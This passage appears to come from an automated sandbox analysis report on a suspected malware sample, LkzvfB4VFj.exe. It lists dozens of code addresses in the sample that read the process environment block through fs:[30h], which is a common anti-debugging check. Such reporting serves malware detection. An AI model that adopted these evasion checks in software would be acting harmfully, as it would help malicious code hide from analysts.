      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FBF4D0 mov eax, dword ptr fs:[00000030h]3_2_35FBF4D0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FBF4D0 mov eax, dword ptr fs:[00000030h]3_2_35FBF4D0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FBF4D0 mov eax, dword ptr fs:[00000030h]3_2_35FBF4D0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FBF4D0 mov eax, dword ptr fs:[00000030h]3_2_35FBF4D0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FB14C9 mov eax, dword ptr fs:[00000030h]3_2_35FB14C9
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FB14C9 mov eax, dword ptr fs:[00000030h]3_2_35FB14C9
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FB14C9 mov eax, dword ptr fs:[00000030h]3_2_35FB14C9
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FB14C9 mov eax, dword ptr fs:[00000030h]3_2_35FB14C9
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FB14C9 mov eax, dword ptr fs:[00000030h]3_2_35FB14C9
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3601174B mov eax, dword ptr fs:[00000030h]3_2_3601174B
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3601174B mov ecx, dword ptr fs:[00000030h]3_2_3601174B
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FCB490 mov eax, dword ptr fs:[00000030h]3_2_35FCB490
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FCB490 mov eax, dword ptr fs:[00000030h]3_2_35FCB490
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3606B781 mov eax, dword ptr fs:[00000030h]3_2_3606B781
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3606B781 mov eax, dword ptr fs:[00000030h]3_2_3606B781
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3605D7A7 mov eax, dword ptr fs:[00000030h]3_2_3605D7A7
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3605D7A7 mov eax, dword ptr fs:[00000030h]3_2_3605D7A7
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3605D7A7 mov eax, dword ptr fs:[00000030h]3_2_3605D7A7
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FCD450 mov eax, dword ptr fs:[00000030h]3_2_35FCD450
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FCD450 mov eax, dword ptr fs:[00000030h]3_2_35FCD450
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F9D454 mov eax, dword ptr fs:[00000030h]3_2_35F9D454
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F9D454 mov eax, dword ptr fs:[00000030h]3_2_35F9D454
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F9D454 mov eax, dword ptr fs:[00000030h]3_2_35F9D454
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F9D454 mov eax, dword ptr fs:[00000030h]3_2_35F9D454
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F9D454 mov eax, dword ptr fs:[00000030h]3_2_35F9D454
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F9D454 mov eax, dword ptr fs:[00000030h]3_2_35F9D454
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_360617BC mov eax, dword ptr fs:[00000030h]3_2_360617BC
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3604F7CF mov eax, dword ptr fs:[00000030h]3_2_3604F7CF
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8B420 mov eax, dword ptr fs:[00000030h]3_2_35F8B420
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FC7425 mov eax, dword ptr fs:[00000030h]3_2_35FC7425
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FC7425 mov ecx, dword ptr fs:[00000030h]3_2_35FC7425
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F977F9 mov eax, dword ptr fs:[00000030h]3_2_35F977F9
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F977F9 mov eax, dword ptr fs:[00000030h]3_2_35F977F9
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3604F409 mov eax, dword ptr fs:[00000030h]3_2_3604F409
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F937E4 mov eax, dword ptr fs:[00000030h]3_2_35F937E4
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F937E4 mov eax, dword ptr fs:[00000030h]3_2_35F937E4
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F937E4 mov eax, dword ptr fs:[00000030h]3_2_35F937E4
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F937E4 mov eax, dword ptr fs:[00000030h]3_2_35F937E4
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F937E4 mov eax, dword ptr fs:[00000030h]3_2_35F937E4
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F937E4 mov eax, dword ptr fs:[00000030h]3_2_35F937E4
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F937E4 mov eax, dword ptr fs:[00000030h]3_2_35F937E4
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3602B420 mov eax, dword ptr fs:[00000030h]3_2_3602B420
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3602B420 mov eax, dword ptr fs:[00000030h]3_2_3602B420
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36019429 mov eax, dword ptr fs:[00000030h]3_2_36019429
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3601F42F mov eax, dword ptr fs:[00000030h]3_2_3601F42F
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3601F42F mov eax, dword ptr fs:[00000030h]3_2_3601F42F
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3601F42F mov eax, dword ptr fs:[00000030h]3_2_3601F42F
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3601F42F mov eax, dword ptr fs:[00000030h]3_2_3601F42F
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3601F42F mov eax, dword ptr fs:[00000030h]3_2_3601F42F
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3604D430 mov eax, dword ptr fs:[00000030h]3_2_3604D430
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3604D430 mov eax, dword ptr fs:[00000030h]3_2_3604D430
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FC1796 mov eax, dword ptr fs:[00000030h]3_2_35FC1796
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FC1796 mov eax, dword ptr fs:[00000030h]3_2_35FC1796
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3604F478 mov eax, dword ptr fs:[00000030h]3_2_3604F478
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FD1763 mov eax, dword ptr fs:[00000030h]3_2_35FD1763
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FD1763 mov eax, dword ptr fs:[00000030h]3_2_35FD1763
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FD1763 mov eax, dword ptr fs:[00000030h]3_2_35FD1763
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FD1763 mov eax, dword ptr fs:[00000030h]3_2_35FD1763
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FD1763 mov eax, dword ptr fs:[00000030h]3_2_35FD1763
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FD1763 mov eax, dword ptr fs:[00000030h]3_2_35FD1763
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3601D4A0 mov ecx, dword ptr fs:[00000030h]3_2_3601D4A0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3601D4A0 mov eax, dword ptr fs:[00000030h]3_2_3601D4A0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3601D4A0 mov eax, dword ptr fs:[00000030h]3_2_3601D4A0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8F75B mov eax, dword ptr fs:[00000030h]3_2_35F8F75B
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8F75B mov eax, dword ptr fs:[00000030h]3_2_35F8F75B
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8F75B mov eax, dword ptr fs:[00000030h]3_2_35F8F75B
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8F75B mov eax, dword ptr fs:[00000030h]3_2_35F8F75B
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8F75B mov eax, dword ptr fs:[00000030h]3_2_35F8F75B
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8F75B mov eax, dword ptr fs:[00000030h]3_2_35F8F75B
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8F75B mov eax, dword ptr fs:[00000030h]3_2_35F8F75B
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8F75B mov eax, dword ptr fs:[00000030h]3_2_35F8F75B
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8F75B mov eax, dword ptr fs:[00000030h]3_2_35F8F75B
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_360454B0 mov eax, dword ptr fs:[00000030h]3_2_360454B0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_360454B0 mov ecx, dword ptr fs:[00000030h]3_2_360454B0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FC174A mov eax, dword ptr fs:[00000030h]3_2_35FC174A
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FC3740 mov eax, dword ptr fs:[00000030h]3_2_35FC3740
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FB9723 mov eax, dword ptr fs:[00000030h]3_2_35FB9723
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3604F4FD mov eax, dword ptr fs:[00000030h]3_2_3604F4FD
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F9D700 mov ecx, dword ptr fs:[00000030h]3_2_35F9D700
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8B705 mov eax, dword ptr fs:[00000030h]3_2_35F8B705
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8B705 mov eax, dword ptr fs:[00000030h]3_2_35F8B705
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8B705 mov eax, dword ptr fs:[00000030h]3_2_35F8B705
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8B705 mov eax, dword ptr fs:[00000030h]3_2_35F8B705
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3604550D mov eax, dword ptr fs:[00000030h]3_2_3604550D
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3604550D mov eax, dword ptr fs:[00000030h]3_2_3604550D
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3604550D mov eax, dword ptr fs:[00000030h]3_2_3604550D
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F896E0 mov eax, dword ptr fs:[00000030h]3_2_35F896E0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F896E0 mov eax, dword ptr fs:[00000030h]3_2_35F896E0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3603F51B mov eax, dword ptr fs:[00000030h]3_2_3603F51B
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3603F51B mov eax, dword ptr fs:[00000030h]3_2_3603F51B
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3603F51B mov eax, dword ptr fs:[00000030h]3_2_3603F51B
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3603F51B mov eax, dword ptr fs:[00000030h]3_2_3603F51B
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3603F51B mov eax, dword ptr fs:[00000030h]3_2_3603F51B
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3603F51B mov eax, dword ptr fs:[00000030h]3_2_3603F51B
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3603F51B mov ecx, dword ptr fs:[00000030h]3_2_3603F51B
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3603F51B mov ecx, dword ptr fs:[00000030h]3_2_3603F51B
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3603F51B mov eax, dword ptr fs:[00000030h]3_2_3603F51B
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3603F51B mov eax, dword ptr fs:[00000030h]3_2_3603F51B
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3603F51B mov eax, dword ptr fs:[00000030h]3_2_3603F51B
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3603F51B mov eax, dword ptr fs:[00000030h]3_2_3603F51B
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3603F51B mov eax, dword ptr fs:[00000030h]3_2_3603F51B
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F956E0 mov eax, dword ptr fs:[00000030h]3_2_35F956E0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F956E0 mov eax, dword ptr fs:[00000030h]3_2_35F956E0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F956E0 mov eax, dword ptr fs:[00000030h]3_2_35F956E0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FBD6D0 mov eax, dword ptr fs:[00000030h]3_2_35FBD6D0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3606B55F mov eax, dword ptr fs:[00000030h]3_2_3606B55F
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3606B55F mov eax, dword ptr fs:[00000030h]3_2_3606B55F
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36019567 mov eax, dword ptr fs:[00000030h]3_2_36019567
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3604F582 mov eax, dword ptr fs:[00000030h]3_2_3604F582
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36037591 mov edi, dword ptr fs:[00000030h]3_2_36037591
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FA3660 mov eax, dword ptr fs:[00000030h]3_2_35FA3660
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FA3660 mov eax, dword ptr fs:[00000030h]3_2_35FA3660
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FA3660 mov eax, dword ptr fs:[00000030h]3_2_35FA3660
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F87662 mov eax, dword ptr fs:[00000030h]3_2_35F87662
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F87662 mov eax, dword ptr fs:[00000030h]3_2_35F87662
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F87662 mov eax, dword ptr fs:[00000030h]3_2_35F87662
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F9965A mov eax, dword ptr fs:[00000030h]3_2_35F9965A
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F9965A mov eax, dword ptr fs:[00000030h]3_2_35F9965A
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FC5654 mov eax, dword ptr fs:[00000030h]3_2_35FC5654
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8D64A mov eax, dword ptr fs:[00000030h]3_2_35F8D64A
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8D64A mov eax, dword ptr fs:[00000030h]3_2_35F8D64A
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F93640 mov eax, dword ptr fs:[00000030h]3_2_35F93640
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FAF640 mov eax, dword ptr fs:[00000030h]3_2_35FAF640
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FAF640 mov eax, dword ptr fs:[00000030h]3_2_35FAF640
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FAF640 mov eax, dword ptr fs:[00000030h]3_2_35FAF640
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FCF63F mov eax, dword ptr fs:[00000030h]3_2_35FCF63F
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FCF63F mov eax, dword ptr fs:[00000030h]3_2_35FCF63F
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3601B5D3 mov eax, dword ptr fs:[00000030h]3_2_3601B5D3
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F97623 mov eax, dword ptr fs:[00000030h]3_2_35F97623
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F95622 mov eax, dword ptr fs:[00000030h]3_2_35F95622
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F95622 mov eax, dword ptr fs:[00000030h]3_2_35F95622
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_360155E0 mov eax, dword ptr fs:[00000030h]3_2_360155E0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FC360F mov eax, dword ptr fs:[00000030h]3_2_35FC360F
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FBD600 mov eax, dword ptr fs:[00000030h]3_2_35FBD600
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FBD600 mov eax, dword ptr fs:[00000030h]3_2_35FBD600
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F891F0 mov eax, dword ptr fs:[00000030h]3_2_35F891F0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F891F0 mov eax, dword ptr fs:[00000030h]3_2_35F891F0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FBF1F0 mov eax, dword ptr fs:[00000030h]3_2_35FBF1F0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FBF1F0 mov eax, dword ptr fs:[00000030h]3_2_35FBF1F0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3601B214 mov eax, dword ptr fs:[00000030h]3_2_3601B214
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3601B214 mov eax, dword ptr fs:[00000030h]3_2_3601B214
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FBB1E0 mov eax, dword ptr fs:[00000030h]3_2_35FBB1E0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FBB1E0 mov eax, dword ptr fs:[00000030h]3_2_35FBB1E0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FBB1E0 mov eax, dword ptr fs:[00000030h]3_2_35FBB1E0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FBB1E0 mov eax, dword ptr fs:[00000030h]3_2_35FBB1E0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FBB1E0 mov eax, dword ptr fs:[00000030h]3_2_35FBB1E0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FBB1E0 mov eax, dword ptr fs:[00000030h]3_2_35FBB1E0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FBB1E0 mov eax, dword ptr fs:[00000030h]3_2_35FBB1E0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F991E5 mov eax, dword ptr fs:[00000030h]3_2_35F991E5
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F991E5 mov eax, dword ptr fs:[00000030h]3_2_35F991E5
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FA51C0 mov eax, dword ptr fs:[00000030h]3_2_35FA51C0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FA51C0 mov eax, dword ptr fs:[00000030h]3_2_35FA51C0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FA51C0 mov eax, dword ptr fs:[00000030h]3_2_35FA51C0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FA51C0 mov eax, dword ptr fs:[00000030h]3_2_35FA51C0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FC31BE mov eax, dword ptr fs:[00000030h]3_2_35FC31BE
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FC31BE mov eax, dword ptr fs:[00000030h]3_2_35FC31BE
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3604F247 mov eax, dword ptr fs:[00000030h]3_2_3604F247
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3605124C mov eax, dword ptr fs:[00000030h]3_2_3605124C
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3605124C mov eax, dword ptr fs:[00000030h]3_2_3605124C
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3605124C mov eax, dword ptr fs:[00000030h]3_2_3605124C
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3605124C mov eax, dword ptr fs:[00000030h]3_2_3605124C
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3600D250 mov eax, dword ptr fs:[00000030h]3_2_3600D250
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3600D250 mov ecx, dword ptr fs:[00000030h]3_2_3600D250
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FD1190 mov eax, dword ptr fs:[00000030h]3_2_35FD1190
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FD1190 mov eax, dword ptr fs:[00000030h]3_2_35FD1190
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FB9194 mov eax, dword ptr fs:[00000030h]3_2_35FB9194
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3604D270 mov eax, dword ptr fs:[00000030h]3_2_3604D270
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3602327E mov eax, dword ptr fs:[00000030h]3_2_3602327E
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3602327E mov eax, dword ptr fs:[00000030h]3_2_3602327E
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3602327E mov eax, dword ptr fs:[00000030h]3_2_3602327E
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3602327E mov eax, dword ptr fs:[00000030h]3_2_3602327E
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3602327E mov eax, dword ptr fs:[00000030h]3_2_3602327E
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3602327E mov eax, dword ptr fs:[00000030h]3_2_3602327E
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FE717A mov eax, dword ptr fs:[00000030h]3_2_35FE717A
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FE717A mov eax, dword ptr fs:[00000030h]3_2_35FE717A
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FC716D mov eax, dword ptr fs:[00000030h]3_2_35FC716D
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3604F2AE mov eax, dword ptr fs:[00000030h]3_2_3604F2AE
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_360592AB mov eax, dword ptr fs:[00000030h]3_2_360592AB
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3606B2BC mov eax, dword ptr fs:[00000030h]3_2_3606B2BC
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3606B2BC mov eax, dword ptr fs:[00000030h]3_2_3606B2BC
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3606B2BC mov eax, dword ptr fs:[00000030h]3_2_3606B2BC
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3606B2BC mov eax, dword ptr fs:[00000030h]3_2_3606B2BC
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_360632C9 mov eax, dword ptr fs:[00000030h]3_2_360632C9
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FC7128 mov eax, dword ptr fs:[00000030h]3_2_35FC7128
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FC7128 mov eax, dword ptr fs:[00000030h]3_2_35FC7128
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8F113 mov eax, dword ptr fs:[00000030h]3_2_35F8F113
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8F113 mov eax, dword ptr fs:[00000030h]3_2_35F8F113
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8F113 mov eax, dword ptr fs:[00000030h]3_2_35F8F113
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8F113 mov eax, dword ptr fs:[00000030h]3_2_35F8F113
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8F113 mov eax, dword ptr fs:[00000030h]3_2_35F8F113
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8F113 mov eax, dword ptr fs:[00000030h]3_2_35F8F113
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8F113 mov eax, dword ptr fs:[00000030h]3_2_35F8F113
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8F113 mov eax, dword ptr fs:[00000030h]3_2_35F8F113
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8F113 mov eax, dword ptr fs:[00000030h]3_2_35F8F113
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8F113 mov eax, dword ptr fs:[00000030h]3_2_35F8F113
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8F113 mov eax, dword ptr fs:[00000030h]3_2_35F8F113
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8F113 mov eax, dword ptr fs:[00000030h]3_2_35F8F113
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8F113 mov eax, dword ptr fs:[00000030h]3_2_35F8F113
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8F113 mov eax, dword ptr fs:[00000030h]3_2_35F8F113
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8F113 mov eax, dword ptr fs:[00000030h]3_2_35F8F113
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8F113 mov eax, dword ptr fs:[00000030h]3_2_35F8F113
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8F113 mov eax, dword ptr fs:[00000030h]3_2_35F8F113
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8F113 mov eax, dword ptr fs:[00000030h]3_2_35F8F113
